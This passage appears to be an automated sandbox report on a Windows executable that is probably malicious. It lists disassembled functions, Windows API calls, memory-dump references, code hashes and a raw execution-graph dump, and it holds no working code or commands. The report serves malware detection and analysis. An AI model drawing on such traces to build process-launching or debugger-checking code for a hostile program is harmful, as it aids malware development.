                                                                                                                                                                                                                                                                                      • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                      • String ID: Version
                                                                                                                                                                                                                                                                                      • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                      • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                      • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                      Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                      • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                      Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                      • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                      Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                      • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                      • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                      Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                      • String ID: !N~
                                                                                                                                                                                                                                                                                      • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                      • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                      • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                      Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                      • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                      • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                      Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                      • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                      • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                      • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                      Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                      • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                      • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                      Execution Coverage:3.3%
                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                      Signature Coverage:3.6%
                                                                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:58
                                                                                                                                                                                                                                                                                      execution_graph 104867 b076b 104868 b0777 CallCatchBlock 104867->104868 104897 b0221 104868->104897 104870 b077e 104871 b08d1 104870->104871 104874 b07a8 104870->104874 104935 b0baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 104871->104935 104873 b08d8 104936 b51c2 28 API calls _abort 104873->104936 104886 b07e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 104874->104886 104908 c27ed 104874->104908 104876 b08de 104937 b5174 28 API calls _abort 104876->104937 104880 b08e6 104881 b07c7 104883 b0848 104916 b0cc9 104883->104916 104885 b084e 104920 9331b 104885->104920 104886->104883 104931 b518a 38 API calls 3 library calls 104886->104931 104891 b086a 104891->104873 104892 b086e 104891->104892 104893 b0877 104892->104893 104933 b5165 28 API calls _abort 104892->104933 104934 b03b0 13 API calls 2 library calls 104893->104934 104896 b087f 104896->104881 104898 b022a 104897->104898 104938 b0a08 IsProcessorFeaturePresent 104898->104938 104900 b0236 104939 b3004 10 API calls 3 library calls 104900->104939 104902 b023b 104907 b023f 104902->104907 104940 c2687 104902->104940 104905 b0256 104905->104870 104907->104870 104909 c2804 104908->104909 104910 b0dfc _ValidateLocalCookies 5 API calls 104909->104910 104911 b07c1 104910->104911 104911->104881 104912 c2791 104911->104912 104913 c27c0 104912->104913 104914 b0dfc _ValidateLocalCookies 5 API calls 104913->104914 104915 c27e9 104914->104915 104915->104886 104991 b26b0 104916->104991 104918 b0cdc GetStartupInfoW 104919 b0cef 104918->104919 104919->104885 104921 93327 IsThemeActive 104920->104921 104922 93382 104920->104922 104993 b52b3 104921->104993 104932 b0d02 GetModuleHandleW 104922->104932 104924 93352 104999 b5319 104924->104999 104926 93359 105006 932e6 SystemParametersInfoW SystemParametersInfoW 104926->105006 104928 93360 105007 9338b 104928->105007 104930 93368 SystemParametersInfoW 104930->104922 104931->104883 104932->104891 104933->104893 104934->104896 104935->104873 104936->104876 104937->104880 104938->104900 104939->104902 104944 cd576 104940->104944 104943 b302d 8 API calls 3 library calls 104943->104907 104945 cd593 104944->104945 104948 cd58f 104944->104948 104945->104948 104950 c4f6e 104945->104950 104947 b0248 104947->104905 104947->104943 104962 b0dfc 104948->104962 104951 c4f7a CallCatchBlock 104950->104951 104969 c32d1 EnterCriticalSection 104951->104969 104953 c4f81 104970 c5422 104953->104970 104955 c4f90 104956 c4f9f 104955->104956 104983 c4e02 29 API calls 104955->104983 104985 c4fbb LeaveCriticalSection _abort 104956->104985 104959 c4f9a 104984 c4eb8 GetStdHandle GetFileType 104959->104984 104960 c4fb0 __fread_nolock 104960->104945 104963 b0e07 IsProcessorFeaturePresent 104962->104963 104964 b0e05 104962->104964 104966 b0fce 104963->104966 104964->104947 104990 b0f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 104966->104990 104968 b10b1 104968->104947 104969->104953 104971 c542e CallCatchBlock 104970->104971 104972 c543b 104971->104972 104973 c5452 104971->104973 104987 bf649 20 API calls __dosmaperr 104972->104987 104986 c32d1 EnterCriticalSection 104973->104986 104976 c5440 104988 c2b5c 26 API calls pre_c_initialization 104976->104988 104978 c548a 104989 c54b1 LeaveCriticalSection _abort 104978->104989 104979 c544a __fread_nolock 104979->104955 104980 c545e 104980->104978 104982 c5373 __wsopen_s 21 API calls 104980->104982 104982->104980 104983->104959 104984->104956 104985->104960 104986->104980 104987->104976 104988->104979 104989->104979 104990->104968 104992 b26b4 104991->104992 104992->104918 104992->104992 104994 b52bf CallCatchBlock 104993->104994 105056 c32d1 EnterCriticalSection 104994->105056 104996 b52ca pre_c_initialization 105057 b530a 104996->105057 104998 b52ff __fread_nolock 104998->104924 105000 b533f 104999->105000 105001 b5325 104999->105001 105000->104926 105001->105000 105061 bf649 20 API calls __dosmaperr 105001->105061 105003 b532f 105062 c2b5c 26 API calls pre_c_initialization 105003->105062 105005 b533a 105005->104926 105006->104928 105008 9339b __wsopen_s 105007->105008 105009 9bf73 8 API calls 105008->105009 105010 933a7 GetCurrentDirectoryW 105009->105010 105063 94fd9 105010->105063 105012 933ce IsDebuggerPresent 105013 933dc 105012->105013 105014 d3ca3 MessageBoxA 105012->105014 105015 d3cbb 105013->105015 105016 933f0 105013->105016 105014->105015 105167 94176 8 API calls 105015->105167 105131 93a95 105016->105131 105023 93462 105025 d3cec SetCurrentDirectoryW 105023->105025 105026 9346a 105023->105026 105025->105026 105027 93475 105026->105027 105168 f1fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 105026->105168 105163 934d3 7 API calls 105027->105163 105030 d3d07 105030->105027 105033 d3d19 105030->105033 105035 95594 10 API calls 105033->105035 105034 9347f 105036 9396b 60 API calls 105034->105036 105040 93494 105034->105040 105037 d3d22 105035->105037 105036->105040 105038 9b329 8 API calls 105037->105038 105039 d3d30 105038->105039 105042 d3d5f 105039->105042 105043 d3d38 105039->105043 105041 934af 105040->105041 105044 93907 Shell_NotifyIconW 105040->105044 105047 934b6 SetCurrentDirectoryW 105041->105047 105046 96b7c 8 API calls 105042->105046 105045 96b7c 8 API calls 105043->105045 105044->105041 105048 d3d43 105045->105048 105049 d3d5b GetForegroundWindow ShellExecuteW 105046->105049 105050 934ca 105047->105050 105051 97bb5 8 API calls 105048->105051 105054 d3d90 105049->105054 105050->104930 105053 d3d51 105051->105053 105055 96b7c 8 API calls 105053->105055 105054->105041 105055->105049 105056->104996 105060 c3319 LeaveCriticalSection 105057->105060 105059 b5311 105059->104998 105060->105059 105061->105003 105062->105005 105064 9bf73 8 API calls 105063->105064 105065 94fef 105064->105065 105169 963d7 105065->105169 105067 9500d 105068 9bd57 8 API calls 105067->105068 105069 95021 105068->105069 105070 9bed9 8 API calls 105069->105070 105071 9502c 105070->105071 105072 9893c 8 API calls 105071->105072 105073 95038 105072->105073 105074 9b329 8 API calls 105073->105074 105075 95045 105074->105075 105076 9be2d 39 API calls 105075->105076 105077 95055 105076->105077 105078 9b329 8 API calls 105077->105078 105079 9507b 105078->105079 105080 9be2d 39 API calls 105079->105080 105081 9508a 105080->105081 105082 9bf73 8 API calls 105081->105082 105083 950a8 105082->105083 105183 951ca 105083->105183 105086 b4d98 40 API calls 105087 950c2 105086->105087 105088 950cc 105087->105088 105089 d4b23 105087->105089 105091 b4d98 40 API calls 105088->105091 105090 951ca 8 API calls 105089->105090 105092 d4b37 105090->105092 105093 950d7 105091->105093 105095 951ca 8 API calls 105092->105095 105093->105092 105094 950e1 105093->105094 105096 b4d98 40 API calls 105094->105096 105097 d4b53 105095->105097 105098 950ec 105096->105098 105101 95594 10 API calls 105097->105101 105098->105097 105099 950f6 105098->105099 105100 b4d98 40 API calls 105099->105100 105102 95101 105100->105102 105103 d4b76 105101->105103 105104 9510b 105102->105104 105105 d4b9f 105102->105105 105106 951ca 8 API calls 105103->105106 105107 9512e 105104->105107 105110 9bed9 8 API calls 105104->105110 105108 951ca 8 API calls 105105->105108 105109 d4b82 105106->105109 105112 d4bda 105107->105112 105116 97e12 8 API calls 105107->105116 105111 d4bbd 105108->105111 105113 9bed9 8 API calls 105109->105113 105114 95121 105110->105114 105115 9bed9 8 API calls 105111->105115 105117 d4b90 105113->105117 105119 951ca 8 API calls 105114->105119 105120 d4bcb 105115->105120 105121 9513e 105116->105121 105118 951ca 8 API calls 105117->105118 105118->105105 105119->105107 105122 951ca 8 API calls 105120->105122 105123 98470 8 API calls 105121->105123 105122->105112 105124 9514c 105123->105124 105125 98a60 8 API calls 105124->105125 105128 95167 105125->105128 105126 9893c 8 API calls 105126->105128 105127 98a60 8 API calls 105127->105128 105128->105126 105128->105127 105129 951ab 105128->105129 105130 951ca 8 API calls 105128->105130 